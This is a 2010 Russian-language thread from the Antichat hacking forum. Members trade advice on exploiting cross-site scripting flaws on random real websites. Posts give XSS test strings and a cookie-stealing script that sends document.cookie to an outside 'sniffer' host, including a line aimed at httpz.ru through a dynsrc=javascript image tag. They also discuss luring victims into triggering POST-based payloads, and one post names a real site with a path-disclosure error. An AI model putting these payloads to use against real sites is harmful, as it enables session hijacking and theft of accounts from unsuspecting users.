HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.09.2010, 01:00
stan_q
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами: 8830468

Репутация: 0
По умолчанию

Предлагаю сделать небольшую объединяющую тему для разбора реальных уязвимостей, будь sqli, xss, инклуды и т.п.

Если выкладываете ссылку на сайт, делайте хайд, чтобы она не индексировалась. Ну и максимально полное описание проблемы + четко сформулированный вопрос. Перед тем, как задать вопрос, прошу пользоваться гуглом и поиском по форуму, чтобы не спрашивать дважды, а то и трижды одно и то же.
 
Ответить с цитированием

  #2  
Старый 09.10.2010, 01:00
Norton710
Постоянный
Регистрация: 03.04.2009
Сообщений: 354
С нами: 9003926

Репутация: 110
По умолчанию

Вобщем проблемма такая) Нашел уязвимость на рандомном сайте

Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



alert('') выполняется при вводе

code:

'>">alert(/XSS/)

в строку поиска или в адресную строку.

Но на этом всё и закончилось, ибо как я не пытался вбить туда скрипт под HPС Снифф, он не выполняется..

Сообственно тело скрипта

code:

">
img = new Image(); img.src = "Адресс снифа"+document.cookie;

Вполне вероятно, что у меня просто неправильное представление о выполнее XSS кода.. Если это так и есть, то ткните, где именно я туплю) буду очень благодарен =)

p.s. сайт не имеет пользовательской авторизации. Но IP и тип браузера на снифф отсылаться-то вроде должны?..
 
Ответить с цитированием

  #3  
Старый 09.10.2010, 01:00
stan_q
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами: 8830468

Репутация: 0
По умолчанию

Срабатывает так:

Скрытый текст (вы должны быть авторизованы и иметь 5 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



Используй код для пассивной атаки из настроек нашего снифера
 
Ответить с цитированием

  #4  
Старый 09.10.2010, 01:00
Norton710
Постоянный
Регистрация: 03.04.2009
Сообщений: 354
С нами: 9003926

Репутация: 110
По умолчанию

stan_q, да, так прокатило =) спасибо большое))

тогда по теме еще один вопрос, возможно ли запускать этот скрипт через результат поиска по сайту (если XSS в поисковике, а адресная строка без уязвимостей)

Я так понимаю, если alert прокатывает, значит сайт пропускает . А если сайт пропускает скрипт, то можно вбить его в поисковик и в обновлённой странице в исходном коде будет целый и невредимый скрипт.. Тоесть при заходе юзера на ссылку с результатом поиска, при загрузке страницы этот скрипт будет выполняться. Я правильно понимаю?)
 
Ответить с цитированием

  #5  
Старый 09.10.2010, 01:00
stan_q
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами: 8830468

Репутация: 0
По умолчанию

Да, если alert срабатывает, то скрипт не фильтрует вводимые данные. Но если запрос передается через POST-запрос, то для эксплуатации надо будет применять разные методы, чтобы заставить жертву выполнить нужный тебе запрос. Т.е. чтобы жертва сама ввела в поиск вредноносный код и нажала энтер для его выполнения. Поправьте меня, если я ошибаюсь.

[offtop] Мой 1000-й пост [/offtop]
 
Ответить с цитированием

  #6  
Старый 09.10.2010, 01:00
Norton710
Постоянный
Регистрация: 03.04.2009
Сообщений: 354
С нами: 9003926

Репутация: 110
По умолчанию

stan_q, Post запросы, вроде как, идут только на ресурсах с коментариями и заливкой файлов. И то, только в части сайта.. Другая часть сайта работает по обычному принципу

Если фильтр изменяет символы
code:

"

, еще есть шанс замутить активную XSS или только пасивную?

В разных частях сайта запросы выполняются по разному или везде один фильтр? тоесть если на всех страницах сайта Alert не канает, возможно ли существование такого отдела сайта, где скрипт запустится? или фильтр работает по всему сайту?

p.s. Гц с юбилейным постом =)
 
Ответить с цитированием

  #7  
Старый 13.10.2010, 01:00
Norton710
Постоянный
Регистрация: 03.04.2009
Сообщений: 354
С нами: 9003926

Репутация: 110
По умолчанию

Столкнулся с такой проблеммой:
На одном форуме нашел возможность добавление

code:

[JPG][/JPG]

Добавил картинку со сниффера - прокатило, и он даже IP пользователей ловит =)
Дальше пробовал поставить Пробел после ссылки на картинку и опять всё отлично =)
Но при попытке вставить Java код, а точнее

code:

http://httpz.ru/картинка dynsrc=javascript:document.write('img = new Image(); img.src = "http://httpz.ru/сниффер?"+document.cookie;')

картинка убивается и на её месте пустое место.
Собственно вопрос - Если такая фигня, активная XSS еще возможно? или полностью отпадает?

p.s Пробовал lowsrc и перестановку Java скрипта.. Картинка всё так же не читается)

p.s.s. Вот всё, что известно мне о сайте.
1)Форум стоит на булке v4.0.0
2)Фильтратор изменяет такие символы, как и "
3)Перевод скриптов в Hex и Юник делают скрипт нечитаемым (хотя он остаётся целым)

Что можно еще попробовать сделать с скриптом?) Интересны все предложения =)
 
Ответить с цитированием

  #8  
Старый 15.10.2010, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

Цитата:


Что можно еще попробовать сделать с скриптом?



HTML highlight

Код:

где http://www.qweqw.ru/1.jpg - адрес отображаемой картинки
 
Ответить с цитированием

  #9  
Старый 15.10.2010, 01:00
Norton710
Постоянный
Регистрация: 03.04.2009
Сообщений: 354
С нами: 9003926

Репутация: 110
По умолчанию

M@ZAX@KEP, не прокатило.. картинка не запустилась ни в одном случае)
 
Ответить с цитированием

  #10  
Старый 16.10.2010, 01:00
stan_q
Новичок
Регистрация: 01.08.2009
Сообщений: 12
С нами: 8830468

Репутация: 0
По умолчанию

Нет там инъекции, там изначально скрипт написан с ошибкой, о чем нам и сообщают при даже стандартном запросе http://teploe-okno.ru/page.php?pid=1

Вторая ошибка дает тебе только раскрытие путей, использовать ее для взлома другим способом возможности нет.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.